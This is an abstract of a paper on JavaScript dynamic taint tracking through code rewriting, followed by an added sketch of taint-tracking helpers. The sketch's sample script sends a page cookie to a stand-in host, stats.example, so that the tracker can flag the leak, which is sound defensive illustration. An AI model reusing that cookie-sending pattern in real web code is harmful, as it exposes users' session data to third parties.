Abstract: The rapid development of the web has led to increasing use of JavaScript, especially in websites requiring rapid responses between the web server and the client, which has led to many security problems. This paper presents a dynamic taint tracking method based on revised (rewritten) JavaScript code. The revised code marks sensitive data, tracks its transmission paths during JavaScript execution, and warns the user of possible leakage of the marked data. The implementation is independent of the JavaScript engine and can be used in a variety of browsers. Tests show that the method can effectively track sensitive data and detect abnormal behavior.
WANG Weiping, BAI Junyang, ZHANG Yuchan, WANG Jianxin. Dynamic taint tracking in JavaScript using revised code [J]. Journal of Tsinghua University (Science and Technology), 2016, 56(9): 956-962, 968. (Original title: 基于代码改写的JavaScript动态污点跟踪.)
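The idea in the abstract, tracking taint through rewritten source rather than inside the engine, can be sketched as follows. This is an added example, not the paper's implementation: the helper names (markSource, tAdd, tSink), the sample script and the stats.example URL are all hypothetical, and the rewritten form is written by hand rather than produced by a rewriter.

```javascript
// Added illustration: runtime helpers that rewritten code calls in place of
// native operators and calls. All names here are hypothetical.
class Tainted {
  constructor(value, labels) {
    this.value = value;            // the real JavaScript value
    this.labels = new Set(labels); // sensitive sources it derives from
  }
}

const warnings = []; // what the user would be warned about

const unwrap = (x) => (x instanceof Tainted ? x.value : x);
const labelsOf = (x) => (x instanceof Tainted ? [...x.labels] : []);

// Source: mark sensitive data where it enters the script.
function markSource(value, label) {
  return new Tainted(value, [label]);
}

// Propagation: stands in for `a + b`; the result is tainted if either operand is.
function tAdd(a, b) {
  const result = unwrap(a) + unwrap(b);
  const labels = [...labelsOf(a), ...labelsOf(b)];
  return labels.length ? new Tainted(result, labels) : result;
}

// Sink: stands in for a call that can send data off the page.
function tSink(sinkName, fn, ...args) {
  for (const arg of args) {
    const labels = labelsOf(arg);
    if (labels.length) warnings.push({ sink: sinkName, labels: labels.sort() });
  }
  return fn(...args.map(unwrap)); // the sink still receives plain values
}

// Original (constructed) script:
//   var url = "https://stats.example/log?d=" + cookie + "&p=" + page;
//   send(url);
// Hand-rewritten form of the same script:
function runRewritten(cookie, page, send) {
  const c = markSource(cookie, "document.cookie");
  let url = tAdd("https://stats.example/log?d=", c);
  url = tAdd(tAdd(url, "&p="), page);
  return tSink("send", send, url);
}
```

Because the tracking lives in ordinary JavaScript helpers, the same rewritten script behaves identically in any engine, which is the portability property the abstract claims.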